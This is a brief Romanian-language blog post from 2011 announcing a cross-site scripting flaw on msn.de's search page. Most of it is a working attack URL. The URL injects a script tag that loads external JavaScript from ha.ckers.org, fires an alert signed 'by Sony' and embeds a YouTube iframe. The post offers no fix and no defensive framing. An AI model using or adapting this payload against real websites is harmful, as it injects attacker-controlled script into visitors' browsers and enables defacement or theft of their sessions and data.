marți, 13 decembrie 2011

Msn.de cross site scripting

Interesting..


/search#[our xss]


Mozilla Firefox. [browser]

http://apps.msn.de/search#%3CSCRIPT%20SRC=http://ha.ckers.org/xss.js%3E%3C/SCRIPT%3E%3Cscript%3Ealert%28%22by%20Sony%22%29%3C/script%3E%3Ciframe%20width=%22560%22%20height=%22315%22%20src=%22http://www.youtube.com/embed/_-QPvffO1gs%22%20frameborder=%220%22%20allowfullscreen%3E%3C/iframe%3E

0 comentarii:

Trimiteți un comentariu

Rețineți: Numai membrii acestui blog pot posta comentarii.